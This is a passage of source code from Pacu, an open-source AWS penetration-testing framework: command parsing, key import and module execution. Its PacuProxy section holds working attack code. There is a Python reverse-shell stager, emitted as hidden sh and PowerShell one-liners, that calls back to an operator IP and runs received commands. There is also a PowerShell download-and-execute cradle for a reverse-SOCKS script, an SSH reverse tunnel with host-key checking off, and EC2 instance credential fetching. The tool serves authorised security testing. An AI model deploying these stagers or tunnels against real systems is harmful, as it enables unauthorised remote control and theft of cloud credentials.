run_prereq = self.input('Data ({}) not found, run module "{}" to fetch it? (y/n) '.format(' > '.join(data), module), session_name=session.name)
else:
run_prereq = 'y'
if run_prereq == 'n':
return False
if args:
self.exec_module(['exec', module] + args.split(' '))
else:
self.exec_module(['exec', module])
return True
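# Illustrative sketch only (not part of Pacu): how a module's main() might call
# fetch_data to make sure enumerated EC2 data exists before using it. The module name
# 'ec2__enum' and the data path are examples, not guaranteed to match this install.
#
# if pacu_main.fetch_data(['EC2', 'Instances'], 'ec2__enum', '--instances') is False:
#     print('Pre-req module did not run successfully. Exiting...')
#     return
# instances = pacu_main.get_active_session().EC2['Instances']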
def key_info(self, alias=''):
""" Return the set of information stored in the session's active key
or the session's key with a specified alias, as a dictionary. """
session = self.get_active_session()
if alias == '':
alias = session.key_alias
aws_key = self.get_aws_key_by_alias(alias)
if aws_key is not None:
return aws_key.get_fields_as_camel_case_dictionary()
else:
return False
def print_key_info(self):
self.print(self.key_info())
def print_all_service_data(self, command):
session = self.get_active_session()
services = session.get_all_aws_data_fields_as_dict()
for service in services.keys():
print(' {}'.format(service))
def install_dependencies(self, external_dependencies):
if len(external_dependencies) < 1:
return True
answer = self.input('This module requires external dependencies: {}\n\nInstall them now? (y/n) '.format(external_dependencies))
if answer == 'n':
self.print('Not installing dependencies, exiting...')
return False
self.print('\nInstalling {} total dependencies...'.format(len(external_dependencies)))
for dependency in external_dependencies:
split = dependency.split('/')
name = split[-1]
if name.split('.')[-1] == 'git':
name = name.split('.')[0]
author = split[-2]
if os.path.exists('./dependencies/{}/{}'.format(author, name)):
self.print(' Dependency {}/{} already installed.'.format(author, name))
else:
try:
self.print(' Installing dependency {}/{} from {}...'.format(author, name, dependency))
subprocess.run(['git', 'clone', dependency, './dependencies/{}/{}'.format(author, name)])
except Exception as error:
self.print(' {} failed, view the error below. If you are unsure, some potential causes are that you are missing "git" on your command line, your git credentials are not properly set, or the GitHub link does not exist.'.format(error.cmd))
self.print(' stdout: {}\nstderr: {}'.format(error.cmd, error.stderr))
self.print(' Exiting module...')
return False
else:
if os.path.exists('./dependencies/{}'.format(name)):
self.print(' Dependency {} already installed.'.format(name))
else:
try:
self.print(' Installing dependency {}...'.format(name))
r = requests.get(dependency, stream=True)
if r.status_code == 404:
raise Exception('File not found.')
with open('./dependencies/{}'.format(name), 'wb') as f:
for chunk in r.iter_content(chunk_size=1024):
if chunk:
f.write(chunk)
except Exception as error:
self.print(' Downloading {} has failed, view the error below.'.format(dependency))
self.print(error)
self.print(' Exiting module...')
return False
self.print('Dependencies finished installing.')
return True
def get_active_session(self):
""" A wrapper for PacuSession.get_active_session, removing the need to
import the PacuSession model. """
return PacuSession.get_active_session(self.database)
def get_proxy_settings(self):
""" A wrapper for ProxySettings.get_proxy_settings, removing the need
to import the ProxySettings model. """
return ProxySettings.get_proxy_settings(self.database)
def get_aws_key_by_alias(self, alias):
""" Return an AWSKey with the supplied alias that is assigned to the
currently active PacuSession from the database, or None if no AWSKey
with the supplied alias exists. If more than one key with the alias
exists for the active session, an exception will be raised. """
session = self.get_active_session()
key = self.database.query(AWSKey) \
.filter(AWSKey.session_id == session.id) \
.filter(AWSKey.key_alias == alias) \
.scalar()
return key
def start_proxy(self):
proxy_settings = self.get_proxy_settings()
self.create_workers(proxy_settings.ip, proxy_settings.port)
self.create_jobs()
return
# Create the proxy threads
def create_workers(self, proxy_ip, proxy_port):
self.server = PacuProxy()
self.server.prepare_server(self.database)
for _ in range(2):
t = threading.Thread(target=self.work, args=(), daemon=True)
t.daemon = True
t.start()
return
# Handle the next job in queue (one thread handles connections, other sends commands)
def work(self):
while True:
x = self.queue.get()
if x == 1:
self.server.socket_create()
self.server.socket_bind()
self.server.accept_connections()
if x == 5:
break # Shutdown listener called
self.queue.task_done()
return
# Fill the queue with jobs
def create_jobs(self):
for x in [1, 2]: # Job numbers
self.queue.put(x)
return
# Return a PacuProxy stager string
def get_proxy_stager(self, ip, port, os):
python_stager = "import os,platform as I,socket as E,subprocess as B,time as t,sys as X,struct as D\\nV=True\\nY=t.sleep\\nclass A(object):\\n def __init__(self):\\n self.S='{}'\\n self.p={}\\n self.s=None\\n def b(self):\\n try:\\n self.s=E.socket()\\n except:\\n pass\\n return\\n def c(self):\\n try:\\n self.s.connect((self.S,self.p))\\n except:\\n Y(5)\\n raise\\n try:\\n self.s.send('{{}}\\{{}}'.format(I.system(),E.gethostname()).encode())\\n except:\\n pass\\n return\\n def d(self,R):\\n Q=R.encode()\\n self.s.send(D.pack('>I',len(Q))+Q)\\n return\\n def e(self):\\n try:\\n self.s.recv(10)\\n except:\\n return\\n self.s.send(D.pack('>I',0))\\n while V:\\n R=None\\n U=self.s.recv(20480)\\n if U==b'': break\\n elif U[:2].decode('utf-8')=='cd':\\n P=U[3:].decode('utf-8')\\n try:\\n os.chdir(P.strip())\\n except Exception as e:\\n R='e:%s'%str(e)\\n else:\\n R=''\\n elif U[:].decode('utf-8')=='q':\\n self.s.close()\\n X.exit(0)\\n elif len(U)>0:\\n try:\\n T=B.Popen(U[:].decode('utf-8'),shell=V,stdout=B.PIPE,stderr=B.PIPE,stdin=B.PIPE)\\n M=T.stdout.read()+T.stderr.read()\\n R=M.decode('utf-8',errors='replace')\\n except Exception as e:\\n R='e:%s'%str(e)\\n if R is not None:\\n try:\\n self.d(R)\\n except:\\n pass\\n self.s.close()\\n return\\ndef f():\\n C=A()\\n C.b()\\n while V:\\n try:\\n C.c()\\n except:\\n Y(5)\\n else:\\n break\\n try:\\n C.e()\\n except SystemExit:\\n X.exit(0)\\n except:\\n pass\\n C.s.close()\\n return\\nX.stderr=object\\nwhile V:\\n f()".format(ip, port)
if os == 'sh': # Linux one-liner (uses \" to escape inline double-quotes)
return 'python -c "{}" &'.format("exec(\\\"\\\"\\\"{}\\\"\\\"\\\")".format(python_stager))
elif os == 'ps': # Windows one-liner (uses `" to escape inline double-quotes)
return 'Start-Process -FilePath "python" -Verb open -WindowStyle Hidden -ArgumentList "-c {}"'.format('exec(`\"`\"`\"{}`\"`\"`\")'.format(python_stager))
else:
return 'Error: Expected target operating system ("sh" or "ps"), received: {}'.format(os)
def get_ssh_user(self, ssh_username, ssh_password=None):
user_id = ''
if ssh_username is None or ssh_username == '':
new_user = self.input('No SSH user found to create the reverse connection back from the target agent. An SSH user on the PacuProxy server is required to create a valid socks proxy routing through the remote agent. The user will be created with a random 25 character password and a /bin/false shell. Generate that user now? (y/n) ')
if new_user == 'y':
# Create a random username that is randomly 3-9 characters
username = ''.join(random.choices(string.ascii_lowercase, k=int(''.join(random.choices('3456789', k=1)))))
command = 'useradd -l -m -s /bin/false {}'.format(username)
self.print('Running command: {}\n'.format(command))
try:
subprocess.run(command.split(' '))
try:
user_id = subprocess.check_output('id -u {}'.format(username), shell=True).decode('utf-8')
if 'no such user' in user_id:
self.print('[0] Failed to find user after creation. Output from command "id -u {}": {}\n'.format(username, user_id))
return None, None, False
self.print('User {} created! Adding a password...\n'.format(username))
password = ''.join(random.choices(string.ascii_lowercase + string.ascii_uppercase + string.digits, k=25))
command = 'echo "{}:{}" | chpasswd'.format(username, password)
try:
subprocess.run(command, shell=True)  # the command contains a pipe, so pass it as a single shell string
except Exception as error:
self.print('Failed to add a password...\n')
return username, None, True
return username, password, self.update_sshd_config()
except Exception as error:
self.print('Failed to find user after creation. Output from command "id -u {}": {}\n'.format(username, user_id))
return None, None, False
except Exception as error:
self.print('Failed to create user...')
return None, None, False
else:
return None, None, False
else:
try:
user_id = subprocess.check_output('id -u {}'.format(ssh_username), shell=True).decode('utf-8')
if 'no such user' in user_id:
self.print('Failed to find a valid SSH user. Output from command "id -u {}": {}\n'.format(ssh_username, user_id))
new_user = self.input('An SSH user on the PacuProxy server is required to create a valid socks proxy routing through the remote agent. The user will be created with a random 25 character password and a /bin/false shell. Do you want to generate that user now? (y/n) ')
if new_user == 'y':
return self.get_ssh_user(None, None)
else:
return None, None, False
else:
return ssh_username, ssh_password, False
except Exception as error:
self.print('Failed to find a valid SSH user. Output from command "id -u {}": {}\n'.format(ssh_username, user_id))
new_user = self.input('An SSH user on the PacuProxy server is required to create a valid socks proxy routing through the remote agent. The user will be created with a random 25 character password and a /bin/false shell. Do you want to generate that user now? (y/n) ')
if new_user == 'y':
return self.get_ssh_user(None, None)
else:
return None, None, False
def update_sshd_config(self):
self.print('Ensuring that local port forwarding is disabled (to prevent a "hack back" scenario). This is done by editing /etc/ssh/sshd_config to either add the line or modify the value if the setting already exists: "AllowTcpForwarding remote". This prevents the target server from forwarding our local ports back to them.')
action = ''
with open('/etc/ssh/sshd_config', 'r') as config_file:
contents = config_file.read()
if 'AllowTcpForwarding' in contents:
if 'AllowTcpForwarding remote' in contents:
self.print('Already disabled.')
else:
action = 'replace'
else:
action = 'add'
with open('/etc/ssh/sshd_config', 'w') as config_file:
if action == 'replace':
contents = re.sub(r'.*AllowTcpForwarding.*', 'AllowTcpForwarding remote', contents)
config_file.write(contents)
return True
elif action == 'add':
contents += '\nAllowTcpForwarding remote'
config_file.write(contents)
return True
return False
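# For illustration, a minimal sketch of the edit made above (setting value unchanged from the code):
#   before: "AllowTcpForwarding yes"   (or no AllowTcpForwarding line at all)
#   after:  "AllowTcpForwarding remote"
# i.e. an existing AllowTcpForwarding line is rewritten in place, or the setting is appended
# to the end of /etc/ssh/sshd_config.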
# Pacu commands and execution
def parse_command(self, command):
command = command.strip()
if command.split(' ')[0] == 'aws':
self.run_aws_cli_command(command)
return
try:
command = shlex.split(command)
except ValueError:
self.print(' Error: Unbalanced quotes in command')
return
if not command or command[0] == '':
return
elif command[0] == 'data':
self.parse_data_command(command)
elif command[0] == 'help':
self.parse_help_command(command)
elif command[0] == 'import_keys':
self.parse_awscli_keys_import(command)
elif command[0] == 'list' or command[0] == 'ls':
self.parse_list_command(command)
elif command[0] == 'load_commands_file':
self.parse_commands_from_file(command)
elif command[0] == 'proxy':
self.parse_proxy_command(command)
elif command[0] == 'regions':
self.display_all_regions(command)
elif command[0] == 'run' or command[0] == 'exec':
self.parse_exec_module_command(command)
elif command[0] == 'search':
self.parse_search_command(command)
elif command[0] == 'services':
self.print_all_service_data(command)
elif command[0] == 'set_keys':
self.set_keys()
elif command[0] == 'set_regions':
self.parse_set_regions_command(command)
elif command[0] == 'swap_keys':
self.swap_keys()
elif command[0] == 'update_regions':
self.update_regions()
elif command[0] == 'whoami':
self.print_key_info()
elif command[0] == 'exit' or command[0] == 'quit':
self.exit()
else:
print(' Error: Unrecognized command')
return
def parse_commands_from_file(self, command):
if len(command) == 1:
self.display_command_help('load_commands_file')
return
commands_file = command[1]
if not os.path.isfile(commands_file):
self.display_command_help('load_commands_file')
return
with open(commands_file, 'r+') as f:
commands = f.readlines()
for command in commands:
print("Executing command: {} ...".format(command))
command_without_space = command.strip()
if command_without_space:
self.parse_command(command_without_space)
def parse_awscli_keys_import(self, command):
if len(command) == 1:
self.display_command_help('import_keys')
return
boto3_session = boto3.session.Session()
if command[1] == '--all':
profiles = boto3_session.available_profiles
for profile_name in profiles:
self.import_awscli_key(profile_name)
return
self.import_awscli_key(command[1])
def import_awscli_key(self, profile_name):
try:
boto3_session = boto3.session.Session(profile_name=profile_name)
creds = boto3_session.get_credentials()
self.set_keys(key_alias='imported-{}'.format(profile_name), access_key_id=creds.access_key, secret_access_key=creds.secret_key, session_token=creds.token)
self.print(' Imported keys as "imported-{}"'.format(profile_name))
except botocore.exceptions.ProfileNotFound as error:
self.print('\n Did not find the AWS CLI profile: {}\n'.format(profile_name))
boto3_session = boto3.session.Session()
print(' Profiles that are available:\n {}\n'.format('\n '.join(boto3_session.available_profiles)))
def run_aws_cli_command(self, command):
try:
result = subprocess.check_output(command, shell=True, stderr=subprocess.STDOUT).decode('utf-8')
except subprocess.CalledProcessError as error:
result = error.output.decode('utf-8')
self.print(result)
def parse_data_command(self, command):
session = self.get_active_session()
proxy_settings = self.get_proxy_settings()
if len(command) == 1:
self.print('\nSession data:')
session.print_all_data_in_session()
self.print('\nProxy data:')
proxy = {
'IP': proxy_settings.ip,
'Port': proxy_settings.port,
'Listening': proxy_settings.listening,
'SSHUsername': proxy_settings.ssh_username,
'SSHPassword': proxy_settings.ssh_password,
'TargetAgent': copy.deepcopy(proxy_settings.target_agent)
}
self.print(proxy)
else:
if command[1] == 'proxy':
proxy = {
'IP': proxy_settings.ip,
'Port': proxy_settings.port,
'Listening': proxy_settings.listening,
'SSHUsername': proxy_settings.ssh_username,
'SSHPassword': proxy_settings.ssh_password,
'TargetAgent': copy.deepcopy(proxy_settings.target_agent)
}
self.print(proxy)
elif command[1] not in session.aws_data_field_names:
print(' Service not found.')
elif getattr(session, command[1]) == {} or getattr(session, command[1]) == [] or getattr(session, command[1]) == '':
print(' No data found.')
else:
print(json.dumps(getattr(session, command[1]), indent=2, sort_keys=True, default=str))
def parse_set_regions_command(self, command):
session = self.get_active_session()
if len(command) > 1:
for region in command[1:]:
if region.lower() == 'all':
session.update(self.database, session_regions=['all'])
print(' The region set for this session has been reset to the default of all supported regions.')
return
if self.validate_region(region) is False:
print(' {} is not a valid region.\n Session regions not changed.'.format(region))
return
session.update(self.database, session_regions=command[1:])
print(' Session regions changed: {}'.format(session.session_regions))
else:
print(' Error: set_regions requires either "all" or at least one region to be specified. Try the "regions" command to view all regions.')
def parse_help_command(self, command):
if len(command) <= 1:
self.display_pacu_help()
elif len(command) > 1 and command[1] in self.COMMANDS:
self.display_command_help(command[1])
else:
self.display_module_help(command[1])
def parse_list_command(self, command):
if len(command) == 1:
self.list_modules('')
elif len(command) == 2:
if command[1] in ('cat', 'category'):
self.list_modules('', by_category=True)
def parse_proxy_command(self, command):
proxy_settings = self.get_proxy_settings()
shm_name = proxy_settings.ssh_shm_name
proxy_ip = proxy_settings.ip
proxy_port = proxy_settings.port
proxy_listening = proxy_settings.listening
proxy_ssh_username = proxy_settings.ssh_username
proxy_ssh_password = proxy_settings.ssh_password
proxy_target_agent = copy.deepcopy(proxy_settings.target_agent)
if len(command) == 1 or (len(command) == 2 and command[1] == 'help'): # Display proxy help
self.display_proxy_help()
elif command[1] == 'start': # Start proxy server
if len(command) < 3:
self.print('You need to pass at least an IP address to proxy start: proxy start <ip> [<port>]')
return
if proxy_listening is False:
if len(command) == 4:
proxy_port = command[3]
else:
proxy_port = 80
proxy_ip = command[2]
if proxy_ip == '0.0.0.0':
self.print('Proxy IP must be the public IP of the server to stage agents correctly and not 0.0.0.0. PacuProxy will fall back to listening on 0.0.0.0 if it fails to start a listener on the supplied IP address, but the public IP is required to send to agents so they can contact the server.')
return
print('Starting PacuProxy on {}:{}...'.format(proxy_ip, proxy_port))
proxy_settings.update(self.database, ip=proxy_ip, port=proxy_port)
self.start_proxy()
proxy_listening = True
proxy_settings.update(self.database, listening=proxy_listening)
return
else:
print('Listener already running: {}'.format(self.server))
elif command[1] == 'list' or command[1] == 'ls': # List active agent connections
self.server.list_connections()
elif command[1] == 'shell': # Run shell command on an agent
if len(command) > 3:
self.server.run_cmd(int(command[2]), self.server.all_connections[int(command[2])], ' '.join(command[3:]))
else:
print('** Error: Expected an agent ID and a shell command. Use the format: proxy shell <agent_id> <shell command> **')
elif command[1] == 'fetch_ec2_keys':
if len(command) == 3:
self.fetch_ec2_keys(int(command[2]), self.server.all_connections[int(command[2])])
else:
self.print('** Error: Expected an agent ID. Use the format: proxy fetch_ec2_keys <agent_id> **')
elif command[1] == 'stop': # Stop proxy server
if proxy_listening is False:
print('No listeners are running.')
else:
if not proxy_target_agent == []:
for i, conn in enumerate(self.server.all_connections):
if self.server.all_addresses[i][0] == proxy_target_agent[0]:
if proxy_target_agent[-1].startswith('Windows'):
pass
# self.server.run_cmd(proxy_target_agent[0], self.server.all_connections[i], 'Stop-PortForwardJobs')
# break
else:
self.server.run_cmd(proxy_target_agent[0], self.server.all_connections[i], 'kill -9 $! && rm /dev/shm/{}'.format(shm_name))
break
self.server.quit_gracefully()
self.queue.put(5)
self.server = None
proxy_listening = False
proxy_target_agent = []
elif command[1] == 'kill': # Kill an agent connection
if len(command) == 3:
self.print('** Killing agent {}... **'.format(int(command[2])))
self.server.quit(int(command[2]), self.server.all_connections[int(command[2])])
self.print('** Agent killed **')
elif len(command) == 2:
print('** Error: Expected an agent ID, received nothing. Use format: proxy kill <agent_id> **')
else:
print('** Error: Expected an agent ID, received: {}'.format(command[2:]))
elif command[1] == 'stager':
if len(command) == 3:
self.print(self.get_proxy_stager(proxy_ip, proxy_port, command[2]))
else:
self.print('** Error: Expected target operating system ("sh" or "ps"), received: {}'.format(command[2:]))
elif command[1] == 'use':
if len(command) == 3:
try:
if command[2] == 'none':
self.print('** No longer using a remote PacuProxy agent to route commands. **')
for i, conn in enumerate(self.server.all_connections):
if self.server.all_addresses[i][0] == proxy_target_agent[0]:
if proxy_target_agent[-1].startswith('Windows'):
pass
# self.server.run_cmd(proxy_target_agent[0], self.server.all_connections[i], 'Stop-PortForwardJobs')
# break
else:
self.server.run_cmd(proxy_target_agent[0], self.server.all_connections[i], 'kill -9 $! && rm /dev/shm/{}'.format(shm_name))
break
proxy_target_agent = []
else:
proxy_target_agent = self.server.all_addresses[int(command[2])]
if platform.system() == 'Windows':
self.print('** Windows hosts do not support module proxying. Run PacuProxy on a Linux host for full module proxying capability. **')
return
try:
test = int(command[2])
except:
self.print('** Error: Invalid agent ID, expected an integer or "none", received: {} **'.format(command[2]))
return
print('Setting proxy target to agent {}...'.format(command[2]))
# Find or create an SSH user
proxy_ssh_username, proxy_ssh_password, restart_sshd = self.get_ssh_user(proxy_ssh_username, proxy_ssh_password)
if proxy_ssh_username is None:
self.print('No SSH user on the local PacuProxy server, not routing traffic through the target agent.')
return
if proxy_ssh_password is None:
self.print('Failed to set a password for user {}, not routing traffic through the target agent.'.format(proxy_ssh_username))
return
# If an SSH user was just generated, make sure local port forwarding is disabled
if restart_sshd is True:
self.print('SSH user setup successfully. It is highly recommended to restart your sshd service before continuing. Part of the SSH user creation process was to restrict access to local port forwarding, but this change requires an sshd restart. If local port forwarding is not disabled, your target machine can "hack back" by forwarding your local ports to their machine and accessing the services hosted on them. This can be done on most systems by running "service sshd restart".\n')
proxy_settings.update(self.database, ssh_username=proxy_ssh_username, ssh_password=proxy_ssh_password)
restart_sshd = self.input(' Do you want Pacu to restart sshd (Warning: If you are currently connected to your server over SSH, you may lose your connection)? Press enter if so, enter "ignore" to ignore this warning, or press Ctrl+C to exit and restart it yourself (Enter/ignore/Ctrl+C): ')
if restart_sshd == 'ignore':
pass
elif restart_sshd == '':
self.print('Restarting sshd...')
subprocess.run('service sshd restart', shell=True)
time.sleep(5)
self.print('Instructing remote agent to connect back...')
if proxy_target_agent[-1].startswith('Windows'):
self.print('Windows hosts not supported yet (coming soon!)')
return
secret_string = ''.join(random.choices(string.ascii_lowercase + string.ascii_uppercase + string.digits, k=25))
class S(BaseHTTPRequestHandler):
def _set_headers(self):
self.send_response(200)
self.send_header('Content-Type', 'text/plain')
self.send_header('Server', random.choice(['Apache', 'nginx'])) # Maybe make this perm per session or remove altogether
self.end_headers()
def do_GET(self):
self._set_headers()
if self.path == '/{}'.format(secret_string):
with open('pp_modules/powershell/reverse-socks.ps1', 'r') as f:
script = f.read().encode()
else:
script = b''
self.wfile.write(script)
return
def run(server_class=HTTPServer, handler_class=S, port=80):
server_address = (proxy_ip, port)
try:
httpd = server_class(server_address, handler_class)
except OSError as error:
if 'Cannot assign requested address' in str(error):
print('Failed to listen on http://{}:{}.'.format(proxy_ip, port))
print('Listening on http://0.0.0.0:{} instead...'.format(port))
server_address = ('0.0.0.0', port)
httpd = server_class(server_address, handler_class)
httpd.serve_forever()
t = threading.Thread(target=run, daemon=True)
t.start()
time.sleep(2)
# 1. Start a new thread
# 2. Start an HTTP server on it with the .ps1 file
# 3. Continue to send the connect_back_cmd
# 4. Kill HTTP server
# Download the script from the PacuProxy server
downloaded_string = "(New-Object System.Net.WebClient).DownloadString('http://{}:5051/{}')".format(proxy_ip, secret_string)
# Run Invoke-Expression on the downloaded script to import it to memory
invoke_expression = 'powershell iex({})'.format(downloaded_string)
# Execute the newly imported script to start the reverse proxy
start_proxy_cmd = 'Start-SocksProxy -sshhost {} -username {} -password {} -RemotePort 8001 -LocalPort 5050'.format(proxy_ip, proxy_ssh_username, proxy_ssh_password)
# Combine the commands into a one-liner
connect_back_cmd = '{}; {}'.format(invoke_expression, start_proxy_cmd)
else:
if shm_name == '':
shm_name = ''.join(random.choices(string.ascii_lowercase + string.ascii_uppercase + string.digits, k=5))
# Create an in-memory file in /dev/shm that contains the password
create_shm = 'echo "echo {}" > /dev/shm/{}'.format(shm_name, shm_name)
# Give the file 777 permissions
add_permissions = 'chmod 777 /dev/shm/{}'.format(shm_name)
# DISPLAY=dummy to emulate a display
# SSH_ASKPASS=/dev/shm/{} to tell SSH that the file will echo it a password
# setsid to avoid any prompts
# Runs ssh to connect to the PacuProxy server over SSH while forwarding a port,
# without trying to open a shell, but keeping a persistent connection, and
# redirecting stderr to stdout (which then comes back to PacuProxy)
connect = 'DISPLAY=dummy SSH_ASKPASS=/dev/shm/{} setsid ssh -o UserKnownHostsFile=/dev/null -f -N -R 8001 -o StrictHostKeyChecking=no {}@{} >/dev/null 2>&1 &'.format(shm_name, proxy_ssh_username, proxy_ip)
# Combine the commands into a one-liner
connect_back_cmd = '{} && {} && {}'.format(create_shm, add_permissions, connect)
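# For illustration only (hypothetical shm_name, username and IP), the assembled one-liner looks like:
#   echo "echo ab1cd" > /dev/shm/ab1cd && chmod 777 /dev/shm/ab1cd && \
#   DISPLAY=dummy SSH_ASKPASS=/dev/shm/ab1cd setsid ssh -o UserKnownHostsFile=/dev/null \
#     -f -N -R 8001 -o StrictHostKeyChecking=no pacuuser@203.0.113.10 >/dev/null 2>&1 &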
self.server.run_cmd(proxy_target_agent[0], self.server.all_connections[int(command[2])], connect_back_cmd)
self.print('Remote agent instructed to connect!')
except Exception as error:
self.print('** Error: Invalid agent ID, expected an integer or "none": {} **'.format(error))
else:
self.print('** Error: Expected an agent ID, received: {}'.format(command[2:]))
else:
self.print('** Unrecognized proxy command: {} **'.format(command[1]))
proxy_settings.update(self.database, ssh_username=proxy_ssh_username, ssh_password=proxy_ssh_password, ssh_shm_name=shm_name, listening=proxy_listening, target_agent=proxy_target_agent)
return
def parse_exec_module_command(self, command):
if len(command) > 1:
self.exec_module(command)
else:
print('The {} command requires a module name. Try using the module search function.'.format(command[0]))
def parse_search_command(self, command):
if len(command) == 1:
self.list_modules('')
elif len(command) == 2:
self.list_modules(command[1])
elif len(command) >= 3:
if command[1] in ('cat', 'category'):
self.list_modules(command[2], by_category=True)
def display_pacu_help(self):
print("""
Pacu - https://github.com/RhinoSecurityLabs/pacu
Written and researched by Spencer Gietzen of Rhino Security Labs - https://rhinosecuritylabs.com/
This was built as a modular, open source tool to assist in penetration testing an AWS environment.
For usage and developer documentation, please visit the GitHub page.
Modules that have pre-requisites will have those listed in that module's help info, but if it is
executed before its pre-reqs have been filled, it will prompt you to run that module then continue
once that is finished, so you have the necessary data for the module you want to run.
Pacu command info:
list/ls List all modules
load_commands_file <file> Load an existing file with list of commands to execute
search [cat[egory]] <search term> Search the list of available modules by name or category
help Display this page of information
help <module name> Display information about a module
    whoami                             Display information regarding the active access keys
data Display all data that is stored in this session. Only fields
with values will be displayed
data <service>|proxy Display all data for a specified service or for PacuProxy
in this session
services Display a list of services that have collected data in the
current session to use with the "data" command
regions Display a list of all valid AWS regions
update_regions Run a script to update the regions database to the newest
version
set_regions <region> [<region>...] Set the default regions for this session. These space-separated
regions will be used for modules where regions are required,
but not supplied by the user. The default set of regions is
every supported region for the service. Supply "all" to this
command to reset the region set to the default of all
supported regions
run/exec <module name> Execute a module
set_keys Add a set of AWS keys to the session and set them as the
default
swap_keys Change the currently active AWS key to another key that has
previously been set for this session
import_keys <profile name>|--all Import AWS keys from the AWS CLI credentials file (located
at ~/.aws/credentials) to the current sessions database.
Enter the name of a profile you would like to import or
supply --all to import all the credentials in the file.
exit/quit Exit Pacu
Other command info:
aws <command> Run an AWS CLI command directly. Note: If Pacu detects "aws"
as the first word of the command, the whole command will
instead be run in a shell so that you can use the AWS CLI
from within Pacu. Due to the command running in a shell,
this enables you to pipe output where needed. An example
would be to run an AWS CLI command and pipe it into "jq"
to parse the data returned. Warning: The AWS CLI's
authentication is not related to Pacu. Be careful to
ensure that you are using the keys you want when using
the AWS CLI. It is suggested to use AWS CLI profiles
to solve this problem
[ADVANCED] PacuProxy command info:
proxy [help] Control PacuProxy/display help
start <ip> [port] Start the PacuProxy listener - port 80 by default.
The listener will attempt to start on the IP
supplied, but some hosts don't allow this. In
this case, PacuProxy will listen on 0.0.0.0 and
use the supplied IP to stage agents and it should
work the same
stop Stop the PacuProxy listener
kill <agent_id> Kill an agent (stop it from running on the host)
list/ls List info on remote agent(s)
use none|<agent_id> Use a remote agent, identified by unique integers
(use "proxy list" to see them). Choose "none" to
no longer use any proxy (route from the local
host instead)
shell <agent_id> <command> Run a shell command on the remote agent
fetch_ec2_keys <agent_id> Try to read the meta-data of the target agent to
request a set of temporary credentials for the
attached instance profile (if there is one),
then save them to the Pacu database and set
them as the active key pair
stager sh|ps Generate a PacuProxy stager. The "sh" format is
for *sh shells in Unix (like bash), and the "ps"
format is for PowerShell on Windows
""")
def display_proxy_help(self):
print("""
PacuProxy command info:
proxy [help] Control PacuProxy/display help
start <ip> [port] Start the PacuProxy listener - port 80 by default.
The listener will attempt to start on the IP
supplied, but some hosts don't allow this. In
this case, PacuProxy will listen on 0.0.0.0 and
use the supplied IP to stage agents and it should
work the same
stop Stop the PacuProxy listener
kill <agent_id> Kill an agent (stop it from running on the host)
list/ls List info on remote agent(s)
use none|<agent_id> Use a remote agent, identified by unique integers
(use "proxy list" to see them). Choose "none" to
no longer use any proxy (route from the local
host instead)
shell <agent_id> <command> Run a shell command on the remote agent
fetch_ec2_keys <agent_id> Try to read the meta-data of the target agent to
request a set of temporary credentials for the
attached instance profile (if there is one),
then save them to the Pacu database and set
them as the active key pair
stager sh|ps Generate a PacuProxy stager. The "sh" format is
for *sh shells in Unix (like bash), and the "ps"
format is for PowerShell on Windows
""")
def update_regions(self):
py_executable = sys.executable
# Update botocore to fetch the latest version of the AWS region_list
try:
self.print(' Fetching latest botocore...\n')
subprocess.run([py_executable, '-m', 'pip', 'install', '--upgrade', 'botocore'])
except:
pip = self.input(' Could not use pip3 or pip to update botocore to the latest version. Enter the name of your pip binary to continue: ').strip()
subprocess.run(['{}'.format(pip), 'install', '--upgrade', 'botocore'])
path = ''
try:
self.print(' Using pip3 to locate botocore...\n')
output = subprocess.check_output('{} -m pip show botocore'.format(py_executable), shell=True)
except:
path = self.input(' Could not use pip to determine botocore\'s location. Enter the path to your Python "dist-packages" folder (example: /usr/local/bin/python3.6/lib/dist-packages): ').strip()
if path == '':
# Account for Windows \r and \\ in the file path
rows = output.decode('utf-8').replace('\r', '').replace('\\\\', '/').split('\n')
for row in rows:
if row.startswith('Location: '):
path = row.split('Location: ')[1]
with open('{}/botocore/data/endpoints.json'.format(path), 'r+') as regions_file:
endpoints = json.load(regions_file)
for partition in endpoints['partitions']:
if partition['partition'] == 'aws':
regions = dict()
regions['all'] = list(partition['regions'].keys())
for service in partition['services']:
regions[service] = partition['services'][service]
with open('modules/service_regions.json', 'w+') as services_file:
json.dump(regions, services_file, default=str, sort_keys=True)
self.print(' Region list updated to the latest version!')
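# For illustration, an abridged sketch of the resulting modules/service_regions.json
# (the exact keys and values depend on the installed botocore endpoints.json):
#   {
#     "all": ["ap-south-1", "eu-west-1", "us-east-1", "..."],
#     "ec2": {"endpoints": {"us-east-1": {}, "eu-west-1": {}, "...": {}}},
#     "s3":  {"endpoints": {"us-east-1": {}, "...": {}}}
#   }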
def import_module_by_name(self, module_name, include=()):
file_path = os.path.join(os.getcwd(), 'modules', module_name, 'main.py')
if os.path.exists(file_path):
import_path = 'modules.{}.main'.format(module_name).replace('/', '.').replace('\\', '.')
module = __import__(import_path, globals(), locals(), include, 0)
importlib.reload(module)
return module
return None
def all_region_prompt(self):
print('Automatically targeting regions:')
for region in self.get_regions('all'):
print(' {}'.format(region))
response = input('Continue? (y/n) ')
if response.lower() == 'y':
return True
else:
return False
###### Some module notes
# For any argument that needs a value and a region for that value, use the form
# value@region
# Arguments that accept multiple values should be comma separated.
######
def exec_module(self, command):
session = self.get_active_session()
proxy_settings = self.get_proxy_settings()
# Run key checks so that if no keys have been set, Pacu doesn't default to
# the AWSCLI default profile:
if not session.access_key_id:
print(' No access key has been set. Not running module.')
return
if not session.secret_access_key:
print(' No secret key has been set. Not running module.')
return
module_name = command[1].lower()
module = self.import_module_by_name(module_name, include=['main', 'module_info', 'summary'])
if module is not None:
# Plaintext Command Log
self.print('{} ({}): {}'.format(session.access_key_id, time.strftime("%a, %d %b %Y %H:%M:%S", time.gmtime()), ' '.join(command).strip()), output='file', is_cmd=True)
## XML Command Log - Figure out how to auto convert to XML
# self.print('<command>{}</command>'.format(cmd), output_type='xml', output='file')
if proxy_settings.target_agent is None or proxy_settings.target_agent == []:
self.print(' Running module {}...'.format(module_name))
else:
self.print(' Running module {} on agent at {}...'.format(module_name, proxy_settings.target_agent[0]))
try:
args = module.parser.parse_args(command[2:])
if 'regions' in args and args.regions is None:
session = self.get_active_session()
if session.session_regions == ['all']:
if not self.all_region_prompt():
return
except SystemExit:
print(' Error: Invalid Arguments')
return
self.running_module_names.append(module.module_info['name'])
try:
summary_data = module.main(command[2:], self)
# If the module's return value is None, it exited early.
if summary_data is not None:
summary = module.summary(summary_data, self)
if len(summary) > 10000:
raise ValueError('The {} module\'s summary is too long ({} characters). Reduce it to 10000 characters or fewer.'.format(module.module_info['name'], len(summary)))
